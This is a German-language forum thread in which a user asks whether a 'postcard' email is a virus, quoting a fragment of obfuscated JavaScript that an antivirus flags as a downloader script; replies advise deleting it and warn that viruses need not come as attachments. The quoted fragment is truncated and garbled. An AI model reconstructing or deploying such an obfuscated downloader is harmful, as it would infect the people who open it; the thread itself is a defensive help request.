Supportnet Computer
Planet of Tech

Supportnet / Forum / Security/Viren

Virus oder harmlos?





Frage

Hallo, nun habe ich schon das 3.Mal in den letzten Tagen eine Mail von post@postcard.com mit der Überschrift "You have received a postcard" und folgendem Inhalt erhalten: "0;j--){r=´´;for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<>=8;s-=2}else{s=6}}document.write(r)}}dc(´Tl_CwkJlUwsIwmJfcWAtP0X@52dyaDXzDMj8aDRzxYsSdoJCaWn@92JCJaxoBeTy95coGWAojFRfTY6oKHcS6K_f´))" href="www.yahoo.com>" target=_blank> " Wenn ich nach www.postcard.com gehe, steht dort "under construction". Frage: ist dies ein harmloser Irrtum oder ein versteckter Virus oder sonstiges? Danke im Voraus!

Antwort 1 von sasch

mal mit einem aktuellen virenscanner gescannt?
übrigens wird immer wieder vor dem öffnen unbekannter mails gewarnt! (so dumm sollte man nicht sein)

Antwort 2 von bennyaua

EZ-Antivirus gibt die Warnmeldung:
"JS/SillyDlScript.AL"
aus.
Aber dieses Script scheint doch harmlos zu sein, oder?
Und, vielleicht etwas naiv gefragt: gefährliche Viren gibt es doch nur in Dateianhängen?

Antwort 3 von sasch

ein unbekanntes script, dass harmlos ist? wozu soll das gut sein?

viren müssen nicht zwingend in anhängen versteckt sein.

Antwort 4 von bennyaua

hat niemand eine idee, was diese javascript bezwecken soll?
schickt es irgendeinen sinnlosen text an yahoo.com ?

Antwort 5 von Saarbauer

Hallo,

wenn du den Absenden nicht kennst oder dir das ganze spanisch vorkommt, keine Experimente, löschen fertig.

Gruß

Helmut

Antwort 6 von draack

Hi,
Zitat:
Aber dieses Script scheint doch harmlos zu sein, oder?
Kann harmlos sein - kann aber auch gefährlich sein. Werde ich nicht austesten.
Zitat:
Und, vielleicht etwas naiv gefragt: gefährliche Viren gibt es doch nur in Dateianhängen?
Ja - sehr naiv. Jede Sicherheitslücke in einem System kann von einem Virus genutzt werden (die letzte große Welle gab´s wegen eines Problems der WMF-Implementierung von MS). Das gilt auch für JavaScript (insbesondere das des MS Internet Exploders).

Tschö,
Volker

Antwort 7 von richklau

ich habe letztens erst gelesen das es ein neuer versuch ist viren in um lauf zu bringen also lösche diese postcards wenn du nicht von irgendjemand so etwas erwartest.

falls ich die site nochmal finde schicke ich euch den link.

Ich möchte kostenlos eine Frage an die Mitglieder stellen:


Ähnliche Themen:


Suche in allen vorhandenen Beiträgen: